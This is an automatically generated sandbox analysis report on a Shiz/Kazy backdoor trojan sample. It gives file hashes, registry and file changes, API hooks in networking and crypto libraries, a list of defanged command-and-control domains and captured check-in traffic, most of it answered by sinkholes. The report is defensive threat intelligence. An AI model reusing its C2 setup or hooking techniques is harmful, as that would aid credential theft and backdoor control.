Gen.Variant.Kazy.39463_4683d51c3b
HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Kazy.39463 (B) (Emsisoft), Gen:Variant.Kazy.39463 (AdAware), Backdoor.Win32.Shiz.FD, Shiz.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: 4683d51c3b9835067dcd58cda8c6eef3
SHA1: 9a163805f4fb9a85c012b555343d3f519e428474
SHA256: a82e735346cf775e2f9da72c6482d1aab0373bf8edd68bc89e24e0a5ad125251
SSDeep: 6144:LWGMdLkiOQt82Be6ONDDO mrkc2T2f86K6mwnmvW5j8ELTq1k:RMdLRCcGa/2T2f8VpMX5j7Lmq
Size: 300544 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 1990-06-24 01:49:03
Analyzed on: WindowsXP SP3 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
%original file name%.exe:188
The Trojan injects its code into the following process(es):
Explorer.EXE:1572
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process %original file name%.exe:188 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\AppPatch\dypttm.exe (2025 bytes)
%System%\config\software (2245 bytes)
%System%\config\SOFTWARE.LOG (3715 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\1.tmp (0 bytes)
Registry activity
The process %original file name%.exe:188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 1B 41 7A F9 91 31 AE 19 E1 E7 6E F7 76 E9 A3"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%WinDir%\apppatch\dypttm.exe_, \??\%WinDir%\apppatch\dypttm.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"a8a67a25" = "pEìX£bÀ¸¬qÄHF‡KöFàc'§¯oD¬<»¹œ³ŒQ\´òd¼Œ¤Kô1,Ã…Â $ë›ÛÌ«â€Â¹l}Ë {Å“zΙC%é[qñl4ì;û´[Ã’#»Û:ÑU„„Ãâ€Ã‚Â\±ª²DÆ’uœ¡Ü¼);¼\Æ’tµ2â€ÂkDùâ€Âaâ€Â*›cü$}Sô|ë$¤ô{¬q³#sÃ…Ã¥\yuJÛËu©|ù¢rKã!$’‹‹b±ÃÄ£ã“ÉUcdÃÂÄZ¡r»ôâ€Â)Û©Š]“QlYÛl]$$D´ƒÌ£Q$aŒ‚*™ü›ÙóÃÂÃÂ=éÃâ€Ãƒâ€˜Ãƒâ€˜Ã¢â‚¬Â°Ã‚¬q9|áÃÂù’‘ÃÂéšÄR"
Dropped PE files
| MD5 | File path |
|---|---|
| b8006753e1eba060ad4e9d610352a31d | c:\WINDOWS\AppPatch\dypttm.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following user-mode hooks in CRYPT32.dll:
CertVerifyCertificateChainPolicy
The Trojan installs the following user-mode hooks in WININET.dll:
HttpSendRequestExA
HttpSendRequestW
InternetReadFileExA
InternetWriteFileExA
InternetQueryDataAvailable
HttpSendRequestExW
InternetReadFile
HttpSendRequestA
InternetCloseHandle
The Trojan installs the following user-mode hooks in USER32.dll:
GetWindowTextA
GetClipboardData
SendInput
GetMessageA
GetMessageW
TranslateMessage
The Trojan installs the following user-mode hooks in ADVAPI32.dll:
CryptEncrypt
The Trojan installs the following user-mode hooks in WS2_32.dll:
WSASend
recv
gethostbyname
WSARecv
send
The Trojan installs the following user-mode hooks in kernel32.dll:
CreateFileW
Propagation
VersionInfo
No information is available.
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 16945 | 17408 | 4.39245 | b1d2f22de021f22fed65c3e87bdecf2c |
| .rdata | 24576 | 4562 | 4608 | 3.47356 | 6ea342db74bcf62f5a110e3508529090 |
| .data | 32768 | 271421 | 269312 | 5.33892 | 739cda9c286f9aa6cc8b987a6aa12090 |
| .rsrc | 307200 | 7800 | 8192 | 5.47487 | 5fb9056704277515c35502a53c57cc60 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 7
882781eb054d8d3499fe06bbbefbd858
88485bacf233f88223a705b62ed072c5
30ca1c768a985c566834858146e9dd02
015e5dbfc3f40541f74df08d1673aba6
9f00add9e51efdc313efb0de6bcf2535
4b9d9acf63b283df8dbd9023164932c1
0e05e087c77d1c951a0a6cb4ae887bf4
URLs
| URL | IP |
|---|---|
| hxxp://keraborigin.eu/login.php | |
| hxxp://rynazuqihoj.eu/login.php | |
| hxxp://digivehusyd.eu/login.php | |
| hxxp://xuxusujenes.eu/login.php | |
| hxxp://qekenilacap.eu/login.php | |
| hxxp://lysovidacyx.eu/login.php | |
| hxxp://tufecagemyl.eu/login.php | |
| hxxp://puregivytoh.eu/login.php | |
| hxxp://norumikemem.eu/login.php | |
| hxxp://lykemujebeq.eu/login.php | |
| hxxp://foxivusozuc.eu/login.php | |
| hxxp://vocakemenir.eu/login.php | |
| hxxp://ryqecolijet.eu/login.php | |
| hxxp://xuqohyxeqak.eu/login.php | |
| hxxp://kefuwidijyp.eu/login.php | |
| hxxp://puvybivihox.eu/login.php | |
| hxxp://jeluganusog.eu/login.php | |
| hxxp://lyvejujolec.eu/login.php | |
| hxxp://nozulufynax.eu/login.php | |
| hxxp://cihunemyror.eu/login.php | |
| hxxp://vofozymufok.eu/login.php | |
| hxxp://ryleryqacic.eu/login.php | |
| hxxp://nopegymozow.eu/login.php | |
| hxxp://fodakyhijyv.eu/login.php | |
| hxxp://xugiqonenuz.eu/login.php | |
| hxxp://pupujeguper.eu/login.php | |
| hxxp://ciliqikytec.eu/login.php | |
| hxxp://kevedorozup.eu/login.php | |
| hxxp://dimutobihom.eu/login.php | |
| hxxp://mamixikusah.eu/login.php | |
| hxxp://jewuqyjywyv.eu/login.php | |
| hxxp://qekikyvutic.eu/login.php | |
| hxxp://tucyguqaciq.eu/login.php | |
| hxxp://jefapexytar.eu/login.php | |
| hxxp://qeqinuqypoq.eu/login.php | |
| hxxp://xuqufyduras.eu/login.php | |
| hxxp://galokusemus.eu/login.php | |
| hxxp://gadufiwabim.eu/login.php | |
| hxxp://qetuluvolos.eu/login.php | |
| hxxp://ganycyhywek.eu/login.php | |
| hxxp://qebahilojam.eu/login.php | |
| hxxp://ryhuzilywax.eu/login.php | |
| hxxp://fokyxazolar.eu/login.php | |
| hxxp://qexofyqihid.eu/login.php | |
| hxxp://lyruxyxaxaw.eu/login.php | |
| hxxp://xukovoruput.eu/login.php | |
| hxxp://nojejecebuw.eu/login.php | |
| hxxp://marytymenok.eu/login.php | |
| hxxp://kemocujufys.eu/login.php | |
| hxxp://gatedyhavyd.eu/login.php | |
| www.bing.com |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET TROJAN Win32.Shiz.fxm/Agent-TBT Checkin
ET POLICY Unsupported/Fake Windows NT Version 5.0
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 2.
Traffic
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: mamixikusah.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:38 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryqecolijet.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:13 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: rynazuqihoj.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: pupujeguper.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:38 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyvejujolec.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:13 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: fokyxazolar.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:13 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: mamixikusah.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:38 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xugiqonenuz.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 200 OK
Connection: close
Set-Cookie: jsessionid=7b3367d08402f904ccd527ca0ffb73fc; Expires=Sat, 02 Sep 2023 06:20:53 GMT
Date: Sat, 03 Sep 2016 06:20:53 GMT
Content-Length: 0
Content-Type: text/plain; charset=utf-8
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lyruxyxaxaw.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:13 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qetuluvolos.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:50 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jefapexytar.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:13 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: digivehusyd.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 200 OK
Connection: close
Set-Cookie: jsessionid=9d6f4e36187098e18c76697bbee25e30; Expires=Sat, 02 Sep 2023 06:20:12 GMT
Date: Sat, 03 Sep 2016 06:20:12 GMT
Content-Length: 0
Content-Type: text/plain; charset=utf-8
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nojejecebuw.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:59 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kefuwidijyp.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:25 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: dimutobihom.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:13 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gatedyhavyd.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:13 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jeluganusog.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:41 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: marytymenok.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:23 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: kemocujufys.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: galokusemus.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:16 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: norumikemem.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:38 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gadufiwabim.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:20 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuqufyduras.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:21:01 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: rynazuqihoj.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: nopegymozow.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:36 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: jewuqyjywyv.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: fodakyhijyv.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: gadufiwabim.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:19 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ciliqikytec.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:16 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qexofyqihid.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:38 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ryleryqacic.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:38 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: marytymenok.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:21 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qexofyqihid.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:39 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: ciliqikytec.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:12 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: keraborigin.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 03 Sep 2016 06:20:12 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Server: sinkhole51..sinkhole-01.sinkhole.tech - where the bots party hard and the rese
archers harder...0..HTTP/1.1 200 OK..Server: nginx..Date: Sat, 03 Sep
2016 06:20:12 GMT..Content-Type: text/html..Transfer-Encoding: chunked
..Connection: keep-alive..Server: sinkhole..51..sinkhole-01.sinkhole.t
ech - where the bots party hard and the researchers harder...0..
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: lykemujebeq.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:37 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: xuqufyduras.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:21:02 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: qetuluvolos.eu
Content-Length: 9
Cache-Control: no-cache
....~7.~'
HTTP/1.1 404 Not Found
Server: nginx 1.1.19
Date: Sat, 03 Sep 2016 06:20:48 GMT
X-Malware-Sinkhole: Arbor Networks
Connection: close
POST /login.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
